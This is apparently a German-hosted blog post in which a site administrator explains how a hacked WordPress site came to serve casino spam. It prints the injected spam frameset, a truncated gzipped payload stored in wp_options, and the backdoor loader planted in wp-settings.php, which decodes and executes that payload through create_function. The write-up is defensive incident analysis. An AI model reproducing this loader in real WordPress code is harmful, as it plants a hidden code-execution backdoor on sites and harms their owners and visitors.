I recently got an email of google informing me about a potential hack of a wordpress site I’m responsible for. It is presenting a massive amount of casino and cash load spam websites. Despite the fact that there is some kind of malicious code on my server, the loss of reputation for the website is massive by google stating it as potentially hacked. I first started by inspecting the html of these spam websites and found an iframe loading content:

<frameset rows="*,0" framespacing="0" border="0" frameborder="NO">
		<frame src="http://allblog.com.ua/tds/?gambl&keyword=casino real money hack" scrolling="auto" noresize />
</frameset>

Clear so far. I started with simple grep commands to search for any part of the url or some html fragments introduced to the site but didn’t find anything. Not unusual so far. After looking around for a while I had a look at a database dump and found a big string block looking rather strange and only being present on the suspicious site. It looks like this:

(5985,'user_callback_init','a:2:{s:4:\"func\";s:9:\"gzinflate\";s:8:\"callback\";s:12459:\"%bd%5a%6d%73%db%36%12%fe%ec%ce%f4 ... 1%ff%01\";}','no')

OK, something gziped in wp_options seems to be very uncommon. I started to search for ‚user_callback_init‘ since it is the key for this „option“. Voila, it is found in the wordpress wp-settings.php file within the following code block:

// Set the user_func and the format specifiers for user function.
$row = $wpdb->get_row( $wpdb->prepare( "SELECT option_value FROM $wpdb->options WHERE option_name = %s LIMIT 1", 'user_callback_init' ) );
$value = unserialize( $row->option_value );
if( is_array( $value ) ) {
        $value = $value['func']( urldecode( $value['callback'] ) );
        $GLOBALS['user_func'] = @create_function( '', '};'.$value.'//' );
}

There we go. I never found out how this got into my wordpress but there have been a lot of vulnerabilities in recent days. I update my wordpress instances at least once a week but I might have been to slow. Otherwise there might be a vulnerability which is not known/fixed so far. There seem to be a lot of wordpress installations with this kind of casino spam. After removing the malicious code, everything is fine again.

  • Marco

    14. August 2015 • Antworten

    I found another documentation of this hack during some research. Here there are some details about the malware itself: http://pastebin.com/mEPgTVpy


Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

*

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden .